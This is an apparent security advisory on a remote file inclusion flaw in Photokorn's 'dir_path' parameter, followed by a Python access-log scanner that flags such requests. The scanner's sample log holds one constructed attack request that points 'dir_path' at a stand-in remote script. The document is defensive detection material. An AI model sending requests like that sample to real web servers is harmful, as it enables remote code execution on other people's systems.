Release Date | Jan 17, 2007 |
Severity | low |
Impact | System compromise: remote code execution. |
Description | This indicates a possible attempt to exploit one of several vulnerabilities that have been identified in Photokorn. These vulnerabilities are due to input validation errors in various scripts (for example "includes/cart.inc.php" and "extras/ext_cats.php") that do not validate the "dir_path" parameter. They could be exploited by remote attackers to include malicious scripts and execute arbitrary commands with the privileges of the web server. |
Affected Products | Photokorn version 1.52 and prior. |
Recommended Actions | Upgrade to version 1.6: http://www.telekorn.com/cms/front_content.php |
Coverage | IPS, VCM |
Common Vulnerabilities and Exposures (CVE) | CVE-2006-4670 |
References | http://www.securityfocus.com/bid/19914 (BugTraq) |
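
An added example (not part of the original advisory and not the vendor's signature logic): a web access-log check for the condition described above, flagging requests that supply `dir_path` in the query string of a PHP script. The log lines, client addresses, host name and the `/photokorn/` install path are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines; addresses, hosts and paths are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [17/Jan/2007:10:01:02 +0000] "GET /photokorn/index.php?action=showgal&cat=3 HTTP/1.1" 200 5120
198.51.100.9 - - [17/Jan/2007:10:01:05 +0000] "GET /photokorn/includes/cart.inc.php?dir_path=http%3A%2F%2Fhost.example.invalid%2Fx.txt HTTP/1.1" 200 312
198.51.100.9 - - [17/Jan/2007:10:01:09 +0000] "GET /photokorn/extras/ext_cats.php?dir_path=test HTTP/1.1" 200 98
203.0.113.4 - - [17/Jan/2007:10:02:00 +0000] "POST /photokorn/includes/cart.inc.php HTTP/1.1" 200 410
"""

# client, method, request target and status from a common/combined log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# a value that starts with a URL scheme, e.g. http:// or ftp://
SCHEME_RE = re.compile(r"[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def find_dir_path_requests(log_text):
    """Return one finding per request that passes dir_path to a .php script.

    Only the query string is inspected; POST bodies are not present in
    access logs and need a WAF or application-level log instead.
    """
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(".php"):
            continue
        # parse_qsl percent-decodes, so encoded values are checked in clear form
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name != "dir_path":  # PHP variable names are case-sensitive
                continue
            kind = "remote-url" if SCHEME_RE.match(value) else "client-supplied"
            findings.append({"client": client, "method": method, "script": url.path,
                             "value": value, "kind": kind, "status": int(status)})
    return findings


if __name__ == "__main__":
    for f in find_dir_path_requests(SAMPLE_LOG):
        print(f"{f['kind']:15} {f['client']:15} {f['script']} -> {f['value']!r}")
```
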